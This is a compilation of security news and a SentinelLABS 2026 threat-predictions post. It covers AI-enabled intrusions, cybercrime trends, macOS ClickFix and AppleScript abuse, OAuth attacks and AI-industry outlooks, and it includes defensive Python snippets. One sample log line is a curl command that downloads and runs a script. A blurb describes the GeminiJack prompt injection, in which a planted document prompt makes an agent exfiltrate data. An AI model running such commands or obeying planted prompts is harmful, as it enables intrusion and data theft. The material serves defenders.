Indirect Malicious Prompt Technique Targets Google Gemini Enterprise

Noma Security today revealed it has discovered a vulnerability in the enterprise edition of Google Gemini that can be used to inject a malicious prompt instructing an artificial intelligence (AI) application or agent to exfiltrate data. Dubbed GeminiJack, the vulnerability lets cybercriminals embed a malicious prompt in, for example, a Google Doc.

The post Indirect Malicious Prompt Technique Targets Google Gemini Enterprise appeared first on Security Boulevard.

Saviynt Raises $700M at Approximately $3B Valuation

By: The Gurus

Saviynt has today announced a $700M Series B Growth Equity Financing at a valuation of approximately $3 billion. Funds managed by KKR, a leading global investment firm, led the round with participation from Sixth Street Growth and TenEleven, as well as new funding from existing Series A investor Carrick Capital Partners.

The investment reflects what many in the cybersecurity sector see as an accelerating shift: as organizations deploy generative AI, autonomous agents, and machine-driven workflows, identity security is becoming core infrastructure rather than a back-office compliance function.

AI Spurs a New Identity Crisis

Saviynt’s platform is designed to manage the full spectrum of digital identities now proliferating across enterprises, from employees and contractors to machine workloads, service accounts, certificates, keys, and increasingly AI agents that operate autonomously.

Unlike earlier identity and access management tools built for predictable human usage, modern platforms must govern identities that make real-time decisions and interact continuously across cloud environments and AI ecosystems.

“This is a defining moment for Saviynt and the industry,” said Founder and CEO Sachin Nayyar. “The demand for secure, governed identity has never been greater. Identity has become central to enterprise AI strategies, and this investment gives us the resources to meet that demand globally.”

Saviynt’s unified architecture merges identity governance (IGA), privileged access management (PAM), application access governance (AAG), identity security posture management (ISPM), and access gateways into a single AI-enabled platform designed for cloud-native environments.

KKR Expands Its Cybersecurity Footprint

For KKR, the investment extends a two-decade track record of backing high-growth cybersecurity firms. The firm has previously supported companies such as Darktrace, ReliaQuest, KnowBe4, Ping Identity, ForgeRock, and Semperis.

“Saviynt has built one of the most advanced and comprehensive identity security platforms in the market, purpose-built for the AI era,” said Ben Pederson, Managing Director at KKR. “We look forward to partnering with the team to scale their platform globally and advance their next-generation AI capabilities.”

KKR is investing through its Next Generation Technology Growth Fund III.

Rapid Customer and Platform Growth

Saviynt’s momentum reflects the growing urgency of securing both human and non-human identities. The company now serves more than 600 enterprise customers, including over 20% of Fortune 100 companies.

The company has recently:

  • Launched new tools for AI Agent Identity Management and Non-Human Identity Management
  • Expanded its PAM and ISPM capabilities
  • Added AI-enabled intelligence to automate onboarding, access reviews, and provisioning
  • Delivered integrations with AWS, CrowdStrike, Zscaler, Wiz, and Cyera

Funding to Accelerate R&D and Ecosystem Expansion

Saviynt plans to use the capital to accelerate product development, expand AI-based utilities designed to help customers migrate from legacy systems, and deepen integrations with hyperscalers, software vendors, and channel partners.

The company said it also aims to strengthen its global go-to-market efforts as enterprises confront the security challenges introduced by AI-driven operations.

Advisors

Piper Sandler served as Saviynt’s exclusive financial advisor. Cooley LLP advised Saviynt, while Latham & Watkins LLP represented Carrick Capital Partners. Gibson, Dunn & Crutcher LLP advised KKR, and Moelis & Co along with Kirkland & Ellis LLP advised Sixth Street Growth.

The post Saviynt Raises $700M at Approximately $3B Valuation appeared first on IT Security Guru.

Cybersecurity 2026 | The Year Ahead in AI, Adversaries, and Global Change

As we close out 2025 and look ahead to 2026, nothing is as we might have expected even a year ago. AI has disrupted, and will continue to disrupt, every corner of modern life. In threat intelligence, SentinelLABS has not only recognized this shift but actively pivoted to meet it. At the same time, geopolitical alignments have grown increasingly unstable, with long-standing relationships now less certain than ever.

How will these new realities shape enterprises’ ability to anticipate and counter the cyber threats forming on the horizon? Predictions always carry the caveat that the future remains intractably unknowable, but even the unexpected emerges from trajectories already in motion.

In this post, SentinelLABS researchers and leaders share their perspectives on how the cyber threat landscape is evolving and what may lie ahead. Read on to explore how developments in global strategy, organized cybercrime, and of course, AI could impact us all in the coming year.

 

The Forgiving Internet is Over

The cybersecurity industry has been living on borrowed time, and AI is about to call in the debt.

The effects of cyberattacks are not always immediately visible: sometimes they go entirely unnoticed. That creates a fundamental cybernetics problem, as there isn’t an obvious causal link between the levers available to defenders and the constraining effects imposed on attackers.

That broken loop can create a corrosive perception that what we do doesn’t have meaningful effects, which has allowed our industry to backslide into lowest-investment, compliance-checkbox territory.

Meanwhile, the feedback delay means that just as exploitation can go unnoticed for years, technical debt sits dormant for prolonged stretches.

We are moving to a future where being vulnerable and being hacked are not two separate steps. Today, organizations run edge appliances riddled with a bottomless supply of weaponizable vulnerabilities and n-days, and yet they often come away uncompromised simply because no one has gotten around to them yet.

Consider Cl0p’s MOVEit campaign: nearly 2,800 organizations compromised, 96 million individuals’ data exposed, and the group was still processing victims more than a year after the initial breach. Cl0p explicitly stated they leaked names slowly to avoid overwhelming their own negotiation capacity. The attack itself was automated, executed over a holiday weekend, and largely complete before the patch dropped, but extortion is human work. That capacity bottleneck, the gap between what automation can compromise and what humans can monetize, is about to disappear.

The internet’s forgiveness is a function of attacker capacity, and AI is a capacity multiplier. When autonomous agents can probe, validate, and exploit at machine speed, the gap between vulnerable and compromised collapses. Without a countervailing investment in AI-native defense, that asymmetry becomes the defining feature of the landscape.

Attackers will harness AI as a force multiplier long before defenders do. Scrappy resourcefulness, clear financial incentives, and freedom from procurement cycles guarantee it.

The alignment discourse is a distraction. Local models on consumer hardware, unconstrained foreign providers, and enterprise no-retention deployments attest to this. The moment capable computer-use models run locally, guardrails become irrelevant. Anthropic’s recent disclosure of Chinese operators using Claude Code for autonomous intrusions is instructive: one operator hitting thirty targets with minimal human intervention. By their own account, model hallucinations did more to slow the attackers down than any guardrails.

If defenders can thank AI for anything, it will be a fundamental reassignment of value, a revamping of capacity, and a necessary reimagining of what’s possible.

Feeble attempts to conjure tens of thousands of competent practitioners out of thin air have clearly floundered. Thankfully, getting more bodies isn’t the only way to increase capacity anymore. AI offers exactly that. It invites us to revisit implicit ROI calculations we abandoned long ago. We can now reconsider activities that required human intervention but were deemed too incremental and repetitive to be consequential: processing every document in a breach disclosure, pre-processing logs at scale, reverse engineering tangential codebases to better understand malicious code. These were not impossible tasks; they were tasks we decided not to attempt. That calculus has changed.
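
As one concrete illustration of that changed calculus, here is a minimal sketch of LLM-assisted log pre-processing, the kind of incremental, repetitive task described above. It assumes the openai v1 Python SDK with an OPENAI_API_KEY in the environment; the model name, prompt, and sample log lines are purely illustrative, not a production pipeline.

    from openai import OpenAI

    client = OpenAI()  # reads OPENAI_API_KEY from the environment

    TRIAGE_PROMPT = (
        "You are a SOC analyst. For each numbered log line, reply with the "
        "line number, SUSPICIOUS or BENIGN, and a one-clause reason."
    )

    def triage_chunk(lines, model="gpt-4o-mini"):
        """Send one batch of raw log lines to the model for a first-pass verdict."""
        numbered = "\n".join(f"{i}: {line}" for i, line in enumerate(lines, 1))
        resp = client.chat.completions.create(
            model=model,
            temperature=0,  # as repeatable as a sampling model allows
            messages=[
                {"role": "system", "content": TRIAGE_PROMPT},
                {"role": "user", "content": numbered},
            ],
        )
        return resp.choices[0].message.content

    sample = [
        "sshd[812]: Accepted publickey for deploy from 10.0.4.7",
        "bash: curl 203.0.113.9/x.sh -o /tmp/.x && chmod +x /tmp/.x",
    ]
    print(triage_chunk(sample))

Even pinned to temperature zero, verdicts like these are not deterministic, which is exactly why outputs belong in a review queue rather than an automated response path.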

However, we must be clear-eyed about what we are adopting. These systems are non-deterministic. We are integrating a new form of evaluative power that is commoditized and cheap but also largely outside our control. Their outputs need to be wrangled into predictably acceptable parameters. The organizations that operationalize AI effectively will be those that learn to harness uncertainty within acceptable bounds rather than pretend it doesn’t exist.

What the market is missing (and desperately requires) are organizations that function as step-down transformers: converting raw frontier capability into security outcomes. Frontier labs are racing toward general capability while treating security as one of several potential markets. The result is a gap between what models can theoretically accomplish and what defenders can reliably deploy. Someone must bridge that gap with products and services that translate commoditized evaluative power into deployable autonomy.

This means investment in experimentation to redefine security problems in terms of what AI can make tractable, improve, or solve without waiting for archaic vendors to catch up. The threat actor(s) using Claude Code to maximize their operational capability didn’t stumble into competence. They iterated, tested, and created a harness for ready deployment with the human as far out of the loop as possible. Defenders will need equivalent rigor.

The opportunity is real and sizable. Seizing it requires that security as a practice becomes AI-native. Organizations that treat AI as another line item will find themselves overwhelmed by an operational tempo they cannot match. Those who internalize it as a fundamental shift, on both sides of the adversarial line, have a chance to redefine the dynamics of the security space. The value generated in 2026 and beyond is entirely concentrated in filling that gap between frontier capability and operational deployment.
Juan Andres Guerrero-Saade (JAGS), Senior Technical Fellow and VP of Intelligence and Security Research, SentinelLABS

 

Hemispheric Crossfire | US–Venezuela Cyber Operations Drag in the Big Three

As of late 2025, Venezuela has already shifted from a chronic crisis to a genuine flashpoint. U.S. carrier groups and expanded maritime operations in the Caribbean, public talk of “closing” Venezuelan airspace, and speculation about regime‑change scenarios have raised the temperature dramatically. Caracas, for its part, is signaling a willingness to fight a long guerrilla struggle and “anarchize” the environment if the U.S. moves militarily. At the same time, Venezuela has deepened its alignment with Russia, Iran, and China, explicitly seeking security guarantees, capital, and military assistance from all three.

In such an environment, a realistic 2026 development is the partial exposure of U.S. offensive cyber and information operations targeting Venezuela. This doesn’t mean Hollywood‑style leaks of every covert program; it looks more like a mosaic of glimpses: a social media platform announces a takedown of coordinated inauthentic networks seeding narratives aimed at Venezuelan military factions and diaspora communities; a contractor leak reveals tooling used to profile Venezuelan officers, union leaders, and local elites; a regional report connects seemingly independent media outlets and meme sources back to U.S.-linked funding and infrastructure, blurring the line between strategic communications and covert influence.

None of this is unprecedented. Great powers all play in this space, but the political salience of Venezuela today means the blowback will be sharper and more public than usual.

That exposure offers raw material for counter‑narratives and operations by Caracas’ backers. Russia is already running well‑funded Spanish‑language disinformation and propaganda campaigns across Latin America, often in coordination with partner state media, with a long‑standing focus on undermining U.S. standing in the region. Iran has used Venezuela as a beachhead for sanctions evasion, proxy networks, and anti‑U.S. activity, including leveraging IRGC and Hezbollah-linked structures to expand its reach in the hemisphere. China, meanwhile, is quietly consolidating intelligence collection capabilities via regional ground stations, telecom infrastructure, and proximity to key undersea cables, assets Western analysts already flag as potential platforms for surveillance of U.S. communications.

In 2026, we should expect to see cyber and information operations explicitly framed as “defending Venezuela from U.S. aggression”, but operationally aimed at the United States and its closest partners.

  • Russian and Venezuela‑aligned influence networks will likely amplify any evidence of U.S. IO/espionage (real, exaggerated, or fabricated) into Spanish- and English‑language campaigns targeting U.S. domestic audiences, Latin American publics, and the Venezuelan diaspora.
  • Iranian‑linked actors can be expected to piggyback on the crisis to probe U.S. critical infrastructure and financial networks under an “Axis of Authoritarianism” narrative, using the Venezuela storyline to justify escalation in cyber operations they were running for other reasons anyway.
  • Chinese‑linked capabilities are more likely to manifest as intensified collection and mapping, SIGINT on U.S. deployments, diplomatic traffic, and commercial flows, rather than loud influence campaigns, but that data will feed the same broader alignment.

For CTI teams, the prediction isn’t some “big Venezuela cyber war”; it’s a convergence problem. A Venezuelan crisis becomes the pretext that ties together Russian, Iranian, Chinese, and local pro‑regime operators into loosely synchronized campaigns: hack‑and‑leak operations targeting U.S. policy debates; cross‑platform disinformation linking Venezuela to border, drugs, and migration narratives; the probing of U.S. energy, maritime, and telecom infrastructure under the cover of regional tension.

Expect to see Spanish‑language infrastructure and personas show up in incidents that ultimately impact U.S. and European networks and more clusters where attribution threads run through Caracas and Moscow/Tehran/Beijing at the same time. The organizations most likely to feel this first are those at the seam lines: energy, logistics, telecom, diaspora media, and NGOs with one foot in the U.S. and one in the region.
Tom Hegel, Distinguished Threat Researcher, SentinelLABS

 

China’s Fifteenth Five Year Plan

A new Five-Year Plan from the Chinese Communist Party means a new hit-list for China’s hackers.

After Xi came into power in 2013, he set about issuing development goals for science and technology in China not seen since the leadership of Mao Zedong. The most notable, Made in China 2025, was released two years later in 2015. After American opprobrium reached its peak in the first Trump administration, China slowly withdrew MIC2025 from the limelight. American attention to the strategy led to significant collection difficulties for the PRC as the US FBI and other government agencies prioritized defense of targeted technologies in the private sector and at US research institutions, like universities.

In 2021, the PRC publicly released only a vague outline of the Party’s Medium- to Long-Term Development Plan for Scientific and Technological Innovation, which set innovation goals for 2025, 2030, and 2035. Foreign attention to MIC2025 led the Party to mark the full content of the plan as “internal circulation only.”

The 15th Five-Year Plan promises to push some of those privately held development goals into the spotlight. The PRC central government will release the official 15th FYP in 2025 and delegate many of the details of achieving its objectives to government ministries. Ministries will release their more detailed versions of the 15th FYP in late 2025 or early 2026. Those documents create a political demand signal that provincial governments and bureaucracies work to realize.

Contracted hackers looking to pilfer western technology and sell it to the highest bidder in China will consult those documents to identify the technologies their customers are likely to pay good money for. If your industry is on the list of targeted technologies, buckle up.
Dakota Cary, Senior Security Advisory Consultant

 

Organized Cybercrime | More Integrated, Streamlined & Aggressive

Commodities and Cartels

Ransomware and infostealers are now commodity features. We’ve blown past this milestone in the last couple of years. Consider ransomware and data exfiltration as givens in the event of any opportunistic breach. While the days of the ‘big brand’ extortion operations are waning, we are seeing more small, organized groups offering à la carte services, including ransomware; ultimately, this is just another feature available in run-of-the-mill malware.

The blending of infostealer and ransomware-style features into Swiss-army-knife tools and services will attract a broader set of criminals, a natural evolution already underway given the heavy reliance of modern attacks on the infostealer-logs ecosystem.

This also overlaps with the trend towards more ‘Cartel-style’ operations or ‘alliances’ which consolidate disparate malicious services into more all-encompassing “MaaS” offerings.

Ransomware & Initial Access Brokers

As these cartels and service ecosystems solidify, the relationships that underpin initial access are tightening as well. Ransomware groups continue to work closely with IABs (Initial Access Brokers), with an increasing number of threat actors publicly and aggressively attempting to recruit ‘trusted’ IABs. Groups like Sicarii advertise special advantages to others willing to partner with them.

Sicarii Ransom’s ‘recruitment’ of IABs

Additionally, we can expect to see IABs starting to offer more targeted bundles consisting of curated credential sets. For example, IABs will start offering ‘chains’ based on cumulative sets of related credentials (chain of VPN->O365->Cloud Console access for a target). There are some specializing in this now, but we expect this to become more mainstream as the infostealer log ecosystem, which feeds many IABs, continues to explode.
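
To make the ‘chain’ idea concrete, here is a minimal defender-side sketch that correlates leaked credentials into per-organization bundles; the record layout, service names, and example domains are illustrative assumptions, not a real infostealer-log format.

    from collections import defaultdict

    # Each record: (victim domain, service category, credential identifier).
    LEAKED = [
        ("acme.example", "vpn", "jdoe"),
        ("acme.example", "o365", "jdoe@acme.example"),
        ("acme.example", "cloud_console", "jdoe-admin"),
        ("globex.example", "o365", "asmith@globex.example"),
    ]

    # The bundle an IAB would market: VPN -> O365 -> cloud console.
    CHAIN = {"vpn", "o365", "cloud_console"}

    def find_full_chains(records):
        """Return domains for which every service in CHAIN has a leaked credential."""
        by_domain = defaultdict(set)
        for domain, service, _cred in records:
            by_domain[domain].add(service)
        return [d for d, services in by_domain.items() if CHAIN <= services]

    print(find_full_chains(LEAKED))  # ['acme.example'] is the highest-priority exposure

The same correlation that lets a broker price a bundle lets a defender rank which leaked credentials to rotate first.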

Increasing Attacks Will Offer Defenders Fewer IOCs and Artifacts

There are some interesting micro trends within these smaller, more obscure operations. One such trend is the omission of ransom notes and other noisy filesystem artifacts, with threat actors moving towards more direct follow-up via email and phone calls to initiate communications.

We have seen groups like “Penguin Cartel” operate in this way, and we expect adversaries to increasingly embrace these alternate methods of first notification in extortive attacks.

Businesses Will Keep Losing Data, Encryption Not Required

This operational “quieting” aligns with another growing trend: attackers no longer need to encrypt data to profit from it. This is far from new, but it is increasing. More crimeware actors eschew encryption entirely, opting to extort victims with the threat of releasing exfiltrated data. Groups like Kairos and WorldLeaks are current examples of this model.

Kairos DLS banner (exfiltration only)

More Automation, More Upscaling

While the “AI revolution” has yet to fully transform the downstream atomic artifacts of crimeware, cybercriminals are taking advantage of various automation options, using AI to augment and scale up their output.

An increasing number of actors are leveraging AI agents, Telegram bots, and similar features to automate both the discovery and sale of their products and their C2 activities. This has long been standard practice in the traditional infostealer community, but we are seeing an uptick across the wider crimeware landscape.

Pressure Escalates Tactics

Threat actors are continuing to apply real-world violence (violence-as-a-service, or VaaS) to ensure their profitability. Naming-and-shaming via data leak sites will remain a permanent feature of the landscape, but we will see further pressure applied to business clients, customers, family members, and entities peripheral to the victim. One common manifestation of this is swatting groups being called upon to apply pressure to financial-crime victims.

Additionally, threat actors will continue to leverage regulatory and compliance laws to apply pressure and time leak announcements around critical events such as earnings calls or M&A negotiations.
Jim Walter, Senior Threat Researcher, SentinelLABS

 

Living Off Apple’s Land | Latent Powers and Stolen Trust

Last year, we noted how threat actors were making hay abusing AppleScript’s spoof-friendly ability to create password dialog boxes to gain elevated privileges, but as many unfortunate victims have been finding out this year, that’s far from all AppleScript is good for.

ClickFix is the new social-engineering kid on the block for every stripe of threat actor, from nation-state APTs to opportunistic cryptowallet-stealing cybercriminals. Dropping a simple AppleScript whose first couple of lines open an innocuous webpage, perhaps a support portal for some legitimate technology, followed by up to 10,000 blank lines and a few malicious lines of code at the end, is a ridiculously simple but effective method of social engineering.

A macOS ClickFix-style social engineering script

2026 will see the continuation of both techniques. However, as old as Python and as powerful as PowerShell, AppleScript has a lot more juice left in it from a threat actor point of view.

We are just beginning to see the first signs of adversaries making use of AppleScript’s Objective-C (AS-ObjC) bridge — a wonderful technology that brings the power of Apple’s Foundation and AppKit frameworks, including NSWorkspace, to simple AppleScripts. In the past, we’ve seen AS-ObjC’s newer cousin JXA (JavaScript for Automation) gain traction in red-teaming tools like Apfell; it’s a small conceptual leap from there to the (arguably) easier world of AppleScript Objective-C.

That opens up a whole new world of in-memory scripting power that otherwise usually requires a compiled binary and readily detectable file writes. Will we see threat actors lean into this old, built-in, not widely known, yet incredibly powerful way of programming Mac computers? If you’re a threat actor, it’s a Living-off-the-Land technology dream come true. If you’re a defender, it’d be smart to start thinking about what that looks like from a telemetry point of view in 2026. And while we’re on the topic of powerful, Apple Framework-enhanced scripting languages, Swift scripting is a thing worth keeping in mind, too.
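
As a starting point for that telemetry thinking, here is a minimal hunting sketch over generic process telemetry, flagging osascript invocations whose script text betrays the AS-ObjC bridge. The NDJSON layout and field names (process_name, args, pid) are assumptions to adapt to whatever schema your EDR actually emits.

    import json

    # Strings that betray the AppleScript-ObjC bridge in inline script text.
    BRIDGE_MARKERS = (
        'use framework "Foundation"',
        'use framework "AppKit"',
        "NSWorkspace",
        "current application's",
    )

    def flag_asobjc_events(telemetry_path):
        """Yield process events where osascript runs bridge-flavored script text."""
        with open(telemetry_path) as fh:
            for line in fh:
                event = json.loads(line)
                if event.get("process_name") != "osascript":
                    continue
                cmdline = " ".join(event.get("args", []))
                if any(marker in cmdline for marker in BRIDGE_MARKERS):
                    yield event

    for hit in flag_asobjc_events("process_events.ndjson"):
        print(hit.get("pid"), hit.get("args"))

Scripts compiled to .scpt or executed from files won’t show these strings on the command line, so pairing this with file-content or script-execution telemetry would be the natural next step.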

On macOS, ClickFix was a necessity-is-the-mother-of-invention response to Apple’s plugging of the Gatekeeper workaround. However, you don’t need a bypass to Apple’s increasingly strict code signing and notarization rules if your malware is signed with a valid developer ID.

Illicit trade in verified Apple Developer accounts is something we’ve seen increase in the latter half of 2025, and it’s only a matter of time before we see these abused by more malware authors. Temporary they may be, as Apple is quick to nix such accounts once identified, but even a short-lived campaign can do a lot of damage against the right targets.

The lesson for defenders is not to treat validly code-signed executables as some kind of exception to detection rules. A valid signature tells a defender little more than that the code passed Apple’s automated checks and has a name attached to it. In the case of malware, that name is almost certainly not the threat actor’s.
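
By way of illustration, here is a minimal sketch that surfaces who signed a binary rather than merely whether it is signed, using the stock codesign and spctl tools; the application path is a placeholder and the parsing is deliberately loose, not a hardened implementation.

    import subprocess

    def signing_details(path):
        """Return codesign's verbose description of `path` (emitted on stderr)."""
        result = subprocess.run(
            ["codesign", "-dvv", path],
            capture_output=True, text=True,
        )
        return result.stderr

    def gatekeeper_verdict(path):
        """Ask Gatekeeper for its assessment of `path` (accepted/rejected)."""
        result = subprocess.run(
            ["spctl", "--assess", "--type", "execute", "-vv", path],
            capture_output=True, text=True,
        )
        return result.stderr.strip()

    APP = "/Applications/Example.app"  # placeholder target
    for line in signing_details(APP).splitlines():
        # The Authority chain and TeamIdentifier name the Developer ID:
        # log them and hunt on them, rather than allowlisting "signed" code.
        if line.startswith(("Authority=", "TeamIdentifier=")):
            print(line)
    print(gatekeeper_verdict(APP))

Treating the signer identity as telemetry to pivot on, rather than as a trust signal, is exactly the adjustment the trade in stolen developer accounts demands.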
Phil Stokes, macOS Research Engineer, SentinelLABS

 

The AI Reckoning | Consolidation, Censorship, and Economic Fallout

Specialized Models Will Belong to Those Who Can Make Them

Over the next few years, we’ll watch a huge number of AI companies simply disappear.

The generic “copilot for X” and “AI workspace” products that dominated pitch decks in 2023–2024 will be reborn as bloodless, checkbox features inside Microsoft 365, Google Workspace, and other large platforms. The quality will be worse than the specialized startups they replace, but that won’t matter because they’ll be easy to buy on an enterprise contract, come bundled with existing tools, and be turned on with a toggle in an admin console.

The result will look like a mass extinction. Valuations will implode and the easy money will evaporate. The tech influencer class on X will still push the “996 grindset mentality” even as the few humbled survivors of the crash pivot from “owning the category” to cutting costs and delivering durable value to a smaller, demanding set of customers.

But this is also exactly the environment in which truly specialized organizations start to matter. These smaller entrants will sit in narrow, high-stakes domains: cybersecurity, law, finance, industrial control, biotech…

In those areas, the winners will be teams that have quietly built a repeatable data and training pipeline, have access to proprietary datasets, and can deploy smaller models that are integrated into specific workflows, regulations, and hardware.

Advances in training efficiency, data curation, and model compression will be among the most valuable pieces of this puzzle, and they will increasingly move out of public view. Labs will publish less, national-security programs will classify more, and a handful of specialized shops will jealously guard their pipelines.

The Bubble Pops in a Poisoned Reality

AI is unpopular as an idea. For most consumers it means glitchy chatbots, over-eager automation at work, auto-generated spam, and marketing departments screaming about “AI-powered” everything. The underlying capabilities are real, but the experience is mostly annoyance, precarity, and a strong sense that someone else is getting rich off a thing that is happening to you, not for you.

On top of that resentment, we’ve layered a classic asset bubble. Capital has flooded into anything AI, driving valuations, headcount, and infrastructure spending far beyond what current use cases justify. In the last year, large tech companies have fired workers while bragging about “AI efficiencies,” even when they’re mostly just undoing years of over-hiring.

The important prediction isn’t “a bubble exists”; it’s how people will react when it finally hits the wall. Within the next year we should expect a dot-com–scale drawdown in AI equity and private valuations: a broad repricing of pure-play “AI companies,” at least one of today’s marquee AI darlings valued at less than a third of its peak, and a long tail of late-stage startups ruthlessly zeroed-out. The hyperscalers will survive because AI is one line item inside a much larger machine; most everyone else will discover that they built a feature, not a business.

The crash will happen in a reality already saturated with synthetic content. In the scramble to justify their spend, organizations are using models to flood every channel with low-cost output: SEO sludge, autogenerated news, endless pitches, synthetic “user reviews,” fake engagement. Previously trusted sites and platforms are already quietly tilting from human-written to machine-written material because the unit economics are irresistible. The problem is they are using last decade’s metrics: what is the actual economic value of Daily Active Users when the content they are consuming is slop that nobody can monopolize?

As the synthetic layer of our online experience deepens, models are trained and retrained on their own exhaust and on rival models’ curated “knowledge bases”, wiki-like sites and reference corpora that are themselves partially or wholly machine-written. Systems start to treat these partisan or synthetic compilations as “ground truth” simply because they look like structured authority.

“Model poisoning” as a subset of a larger, more pernicious “reality poisoning”

The targeted threat of “model poisoning” becomes the inescapable threat of “reality poisoning,” and the line between what actually happened and what the machine inferred as plausible will vanish.

This increasingly synthetic environment directly undermines the business case that justified the bubble in the first place. Search gets worse, watered down, and commoditized. Feeds become vacuum-sealed bubbles where nothing breaks containment. Analytics get noisier and less reliable. Conversion rates slip as users learn to distrust what they see on screens. Enterprises that bought AI to “supercharge knowledge work” find that their internal knowledge bases are now clogged with plausible nonsense that’s harder and harder to audit. The marginal ROI on yet another AI integration rapidly decays.

So when the capital tide goes out, the public story will be simple and hostile: “AI took my job and ruined the internet.” The actual big picture may be composed of macroeconomics, overcapacity, and misallocated capital, but the emotional truth will be that AI made jobs less secure, the information environment less trustworthy, and the daily experience of technology spammy and brittle.

In the aftermath, the models will remain, the infrastructure will remain, and the incumbents will survive by using them where they produce actual value. What won’t survive will be broad-based cultural, political, and financial enthusiasm.

In the next year, we will end up with powerful systems embedded deep in a few dominant platforms, operating in a permanently contaminated data environment, surrounded by a public that no longer believes the marketing and cannot trust the outputs.

Dual-Use Will Eat Alignment and Turn Into Regional Censorship

AI and LLM development are on track to become core pillars of national defense. Questions about “U.S. vs. China vs. everyone else” will move out of policy think-tanks and into mainstream geopolitics. Behind closed doors, frontier systems will be evaluated less as “products” and more as strategic infrastructure: tools that can rewrite the balance of cyber offense, intelligence gathering, and information operations both at home and abroad.

In this world, statements of “public model alignment” will become less important. The loud, visible debates about fairness, bias, and “responsible AI” will continue, but the most consequential work on offensive AI capabilities will move into secure facilities, export-controlled supply chains, and gray markets. The question will shift from “Is this system aligned with human values?” to “Is this system aligned with our national interests?”

Because AI systems are inherently dual-use, offensive capabilities and control affordances will be developed in parallel. The same model that politely refuses to discuss certain topics in a consumer chat interface will have close cousins tuned for intrusion discovery, vulnerability triage, targeted influence, and automated exploitation. Many of those capabilities will originate in state-backed programs, but they won’t stay there. They’ll diffuse into law enforcement, domestic security services, and private contractors, where they will be applied to civilian populations as instruments of soft control and, when desired, hard power.

That logic will leak out into the consumer layer as regionalized safety controls. As these technologies scale, they will increasingly mirror existing patterns of information control. Providers will ship different rule-sets and behaviors by jurisdiction, the way streaming platforms already fragment their catalogs country by country. Providers will claim that this represents “localization” efforts — where differences in language and cultural references are updated for the target population. What they are really localizing is the range of thinkable thoughts within a language model.

Whatever their marketing stance on “neutrality” or aversion to particular ideological labels, major providers will have very strong incentives to align their models with local statutes, regulatory guidance, and informal political red lines. If a given government can threaten licenses, data-center permits, key executives, or revenue streams, the “alignment layer” becomes one more lever for the powerful. Governments will jump at the opportunity to tweak refusal patterns, soften a model’s treatment of their history, or remove guidance that might make protests more effective.

Over time, legislators, regulators, authoritarian regimes, and litigators will get a much sharper sense of where these levers sit inside these systems: how content filters work, what knobs exist for toxicity, radicalization, and persuasion, or how model-delivered advice translates into real-world actions. The volume and specificity of legal and policy demands on these knobs will expand accordingly.

Engineering teams at these companies will spend less time debating abstract philosophical framings and more time implementing tightly scoped, jurisdiction-specific constraints designed by lawyers and national security officials.

The result will be a stratified ecosystem:

  • Public, region-locked models that are heavily constrained will become the systems most people will interact with day to day.
  • Institutional and security-grade models, derived from the same or larger bases but deployed inside governments, defense contractors, and domestic security agencies, will be used to profile, predict and shape human behavior at scale.
  • Informal and illicit models will be leaked, stolen, or quietly licensed and recirculate similar capabilities into criminal markets and non-state actors.

In all three layers, “alignment” will be eaten by dual-use. The systems will be “aligned” to institutional goals, not to a shared, global notion of human flourishing. The public will experience this as an explosion of region-specific censorship and weirdly divergent realities between models that reflect different value systems.

In short, the coming wave of LLM censorship by major U.S. and allied companies is the civilian-facing expression of a deeper shift. Once AI is framed first as a strategic asset and only secondarily as a consumer product, dual-use incentives dominate. Alignment becomes a branch of national security and regulatory compliance, and the map of model behavior starts to trace the borders of political power rather than the contours of an egalitarian reality.
Gabriel Bernadett-Shapiro, Distinguished AI Research Scientist, SentinelLABS

 

Zero or No Trust | Interconnected Services Lead to Increasingly Devastating Intrusions

Zero Trust Architecture networks have become increasingly common over the last five years, with the pandemic driving many organizations to rapidly adopt and implement related technologies to support the sudden uptick in remote work. Threat actors were slower to adapt through 2020-2022, as there were plenty of targets who had not jumped on the ZTA bandwagon. Early adopters on the attacker side made headlines by compromising often tech-forward organizations, a far cry from the companies typically in the news for huge ransomware attacks against legacy networks.

In 2025, there were several campaigns where actors targeted highly interconnected environments by focusing on identity providers. The ShinyHunters campaign abusing OAuth relationships in certain Salesforce user environments is a notable example: granting OAuth access to the Data Loader app enabled the attackers to access the victim environment and exfiltrate data using a Salesforce tool intended to do exactly that. Similarly, in August 2025 attackers abused the Salesloft Drift application to hijack OAuth rights to harvest cloud service and SaaS credentials from the targeted environment.

There is huge potential for actors who identify improperly configured or abandoned OAuth-enabled applications. This was demonstrated in 2024 when Midnight Blizzard struck gold by discovering a legacy application in Microsoft’s test environment that enabled high-privileged access to corporate environments. For several years, skilled cloud attackers have been working on tools that map both resources and OAuth relationships in target environments.
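
Here is a hedged sketch of that mapping from the defender’s side, using Microsoft Graph’s oauth2PermissionGrants endpoint to list delegated grants and flag over-scoped or forgotten applications. It assumes you already hold a Graph access token with suitable read permissions in a GRAPH_TOKEN environment variable; the risky-scope list is illustrative, and pagination and error handling are trimmed for brevity.

    import os
    import requests

    GRAPH = "https://graph.microsoft.com/v1.0"
    HEADERS = {"Authorization": f"Bearer {os.environ['GRAPH_TOKEN']}"}

    # Delegated scopes that deserve a second look when granted tenant-wide.
    RISKY_SCOPES = {"Mail.Read", "Files.ReadWrite.All", "Directory.ReadWrite.All"}

    def risky_grants():
        """Yield (app id, consent type, scopes) for grants containing a risky scope."""
        resp = requests.get(f"{GRAPH}/oauth2PermissionGrants", headers=HEADERS)
        resp.raise_for_status()
        for grant in resp.json()["value"]:
            scopes = set((grant.get("scope") or "").split())
            if scopes & RISKY_SCOPES:
                yield grant["clientId"], grant.get("consentType"), sorted(scopes)

    for client_id, consent, scopes in risky_grants():
        # consentType "AllPrincipals" means the grant applies tenant-wide.
        print(client_id, consent, scopes)

Attackers run the same kind of enumeration from the other direction, which is why abandoned but still-consented applications make such attractive targets.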

While gaining access to such a high value environment as a major cloud service and operating system provider may not be feasible for most actors, increases in automated scanning and data evaluation will only make finding new, well-connected targets easier.

Based on the increased prevalence of Zero Trust environments, an increased attacker focus and understanding of SaaS identity providers, and the rise in sophistication of tools used to identify relationships between identities and assets in organizations’ environments, we believe there is a significant risk for attacks that misuse the new forms of “trust” used to authenticate applications within environments.

A potential evolution we may see in 2026 is tooling that not only targets one SaaS application and its downstream connections but also incorporates some degree of automation or evaluation through agentic AI analysis, continuing into further phases of intrusion based on findings from the previous phase.
Alex Delamotte, Senior Threat Researcher, SentinelLABS

 

AI-Driven Threats | Blurred Attribution and the DPRK Wildcard

